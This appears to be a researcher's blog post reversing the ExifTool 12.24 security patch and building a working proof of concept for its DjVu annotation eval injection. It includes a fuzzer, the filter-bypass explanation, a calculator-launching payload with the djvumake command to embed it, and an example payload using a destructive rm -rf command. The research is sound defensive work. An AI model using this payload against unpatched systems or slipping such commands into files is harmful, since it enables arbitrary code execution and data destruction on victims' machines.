The bug

In the early moring of the 24th of April, an interesting exploit popped up on my Twitter feed:

The tweet shows how running Exiftool on a simple image causes arbitrary code execution. This piqued my interest, as Exiftool is not only really common in CTF challenges, but also used in tons of software that needs to display Exif data.

Proof of concept code for the exploit wasn’t public yet1, so I set out to reverse the security patch and find a way to exploit it.

Examining the patch

Let’s start by looking at the release notes for the patched version (12.24). We’ll find exactly one entry about a security issue that got fixed in this release.

Apr. 13, 2021 - Version 12.24
 [...]
  - Patched security vulnerability in DjVu reader
 [...]

Armed with this information, we can examine the git diff between version 12.23 and version 12.24. More specifically, let’s look at the changes to lib/Image/Exiftool/DjVu.pm, the Perl module that handles DjVu data.

--- a/lib/Image/ExifTool/DjVu.pm
+++ b/lib/Image/ExifTool/DjVu.pm
@@ -227,10 +227,11 @@ Tok: for (;;) {
                 last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
                 $tok .= '"';    # quote is part of the string
             }
-            # must protect unescaped "$" and "@" symbols, and "\" at end of string
-            $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
-            # convert C escape sequences (allowed in quoted text)
-            $tok = eval qq{"$tok"};
+            # convert C escape sequences, allowed in quoted text
+            # (note: this only converts a few of them!)
+            my %esc = ( a => "\a", b => "\b", f => "\f", n => "\n",
+                        r => "\r", t => "\t", '"' => '"', '\\' => '\\' );
+            $tok =~ s/\\(.)/$esc{$1}||'\\'.$1/egs;
         } else {                # key name
             pos($$dataPt) = pos($$dataPt) - 1;
             # allow anything in key but whitespace, braces and double quotes

Alright, at this point, we know two things:

  • There is an awful eval injection.
  • The bug is in these two lines of code, found in the ParseAnt function.

Deja-what?

But before we dig deeper into the patch, what even is a DjVu file? DjVu is a document format, somewhat similar to PDF. It is not very commonly used, but it has a number of different annotation and metadata fields that Exiftool can parse.

Creating a DjVu File

To create a DjVu file, we’ll be using the DjVu Libre suite on Linux. The contents of the file don’t really matter, we just care about the attached metadata.

First, we create a text file with these contents:

(metadata
	(note "Hello World!")
)

Then make a new empty DjVu file, using the text file as annotation data:

djvumake test.djvu INFO=0,0 BGjp=/dev/null ANTa=annotation-file.txt

When we now parse this file with Exiftool, we’ll see the “Hello World!” note in the output.

Walking the happy path

Before we try to feed Exiftool invalid data, let’s figure out how this metadata is parsed.

The DjVu.pm module first uses the following snippet to check if there are any annotations attached to the file:

sub ProcessAnt($$$)
{
    # ... < snip > ...
    # quick pre-scan to check for metadata or XMP
    return 1 unless $$dataPt =~ /\(\s*(metadata|xmp)[\s("]/s;

    # parse annotations into a tree structure
    pos($$dataPt) = 0;
    my $toks = ParseAnt($dataPt) or return 0;
    # ... < snip > ...
}

As long as our annotation file starts with (xmp or (metadata , we’ll reach the vulnerable ParseAnt function. This function will extract individual “tokens”, and return the metadata.

The Vulnerability

Eval

Since we know the exact lines that changed, it is easy to pin down the vulnerability. Once ParseAnt has found a string within double quotes (saved in $tok), it executes the following lines of code:

# must protect unescaped "$" and "@" symbols, and "\" at end of string
$tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
# convert C escape sequences (allowed in quoted text)
$tok = eval qq{"$tok"};

The qq operator adds an additional set of quotes, causing the inner quotes to be included in the eval. How could this be exploited? Well, if $tok can contain quotes, an attacker might pass the following payload into eval:

# $tok = '" . `rm -rf  /*` ."'
$tok = eval qq{"" . `rm -rf  /*` . ""};

This will concatenate (.) the output of rm -rf /* with two empty strings. Sadly for us, $tok is filtered in an attempt to prevent this attack, so we can’t simply include quotes.

Filter bypass

We need to find a way to smuggle a quote into the eval statement without being escaped. The following code snippet is responsible for finding a substring to pass to eval. It might be a bit hard to read if you’re not too familiar with Perl, but the basic idea is as follows:

  1. Loop over all characters.
  2. If we find a double quote, start building a substring.
  3. End the substring at the next non-escaped double quote and eval it.
Tok: for (;;) {
    # find the next token
    last unless $$dataPt =~ /(\S)/sg;   # get next non-space character
    if ($1 eq '(') {       # start of list
        # ... < snip > ...
    } elsif ($1 eq '"') {  # quoted string
        $tok = '';
        for (;;) {
            # get string up to the next quotation mark
            my $pos = pos($$dataPt);
            last Tok unless $$dataPt =~ /"/sg;
            $tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
            # we're good unless quote was escaped by odd number of backslashes
            last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
            $tok .= '"';    # quote is part of the string
        }
        # must protect unescaped "$" and "@" symbols, and "\" at end of string
        $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
        # convert C escape sequences (allowed in quoted text)
        $tok = eval qq{"$tok"};
    } else {
        # ... <snip> ...
    }
    # ... <snip> ...
}

If you’re familiar with Perl, you may be able to spot the bug directly. As a Perl noob, I struggled to find a filter bypass manually. Instead, I made a simple Python fuzzer to find the escape.

Can we make a fuzzer pop calc?

First, let’s reason about what our payload must look like. We know it has to start with (xmp " to trigger the eval we’re interested in. Beyond that, we need some kind of payload in the middle, followed by some additional escape characters as a suffix.

With this information, we can build the following template string:

TEMPLATE = r"(xmp \"{}`mate-calc`{}"

Next, we create a few helper functions to create a DjVu file and parse it with Exiftool.

def get_data():
    k1 = random.randint(0, 10)
    k2 = random.randint(0, 10)
    # Special characters that may hit edge cases.
    alph  = "\\\".+*\n"
    # Pick some random characters to insert into our template.
    before = ''.join(random.choices(alph, k=k1))
    after  = ''.join(random.choices(alph, k=k2))
    return TEMPLATE.format(before, after).encode()

def do_fuzz_case():
    # Create an annotation file
    with open("fuzz-annotation.txt", "wb") as ant_file:
        data = get_data()
        ant_file.write(data)
    # Embed it in a new DjVu file
    p = Popen(["djvumake", "fuzz.djvu", "INFO=0,0", "BGjp=/dev/null", 
               "ANTa=fuzz-annotation.txt"])
    try:
	# djvumake would sometimes get stuck, so I added a small timeout.
        p.communicate(timeout=0.8)
    except:
        return False
    # Parse the DjVu file with Exiftool
    p = Popen(["./exiftool/exiftool", "fuzz.djvu"], stdout=PIPE, stderr=PIPE)
    stdout, stderr = p.communicate()
    # If Exiftool returned a warning, print the fuzz case that caused it.
    if stderr:
        print(f">>>{data}<<<", stderr)

Now all that’s left is to call this function over and over again until we get interesting output. This fuzzer is not very sophisticated2, and will only get a couple execs per second. Nevertheless, it starts to produce interesting errors within a couple minutes:

>>>b'(xmp \\"\\\n"\\*"\\"."`mate-calc`\\\n'<<< b'Backslash found where operator expected at (eval 8) line 2, near ""\\\n"\\"\n\t(Missing operator before \\?)\n'

>>>b'(xmp \\"\\\n"+*\\*\n`mate-calc`"""\n\\?"."'<<< b'String found where operator expected at (eval 8) line 3, at end of line\n\t(Missing semicolon on previous line?)\n'

>>>b'(xmp \\"+\\"\\\n"*\\""`mate-calc`"+*+"..'<<< b'Argument "+"\\n" isn\'t numeric in multiplication (*) at (eval 8) line 1.\n'

In my opinion, the last crash is the easiest to understand and ultimately helped me the most in recreating the exploit, so it seems like a good place to start. After minimizing the crash file, we end up with the following annotation data:

(xmp "\
"*\""
Argument "\n" isn't numeric in multiplication (*) at (eval 8) line 1.

The warning informs us that our eval tried to do a multiplication of a newline character with something. This looks promising! If we can do multiplications, we have broken out of the double quotes and can execute Perl code.

Now all we need to do is replace the multiplication with a string concatenation and execute a shell command:

(xmp "\
" . `mate-calc` . \""

Calc.djvu

So how does this bypass work?

The bypass relies on the following line that determines where to “cut” the token:

# we're good unless quote was escaped by odd number of backslashes
last unless $tok =~ /(\\+)$/ and length($1) & 0x01;

The regex is meant to check whether the current substring ends in an odd number of backslashes. If it does, the quote it just found is assumed to be properly escaped, and should be part of the metadata.

This logic breaks down when the last two characters before the quote are a backslash and a linebreak. The regex will see \\n and “think” that it matched \. This causes the quote to be included in the substring, even though the backslash is actually escaping the linebreak instead of the quote.

At this point, we’ve broken out of the string context and we can start executing arbitrary Perl code. Finally, we need to end our payload with one escaped quote, followed by a real quote to end this token.


  1. This post was written on the 26th of April, but only made public on the 11th of May after the initial report was made released. ↩︎

  2. In fact, this is probably the worst fuzzer I’ve ever written. It’s single threaded, hits disk twice per fuzz case, prints to stdout, … ↩︎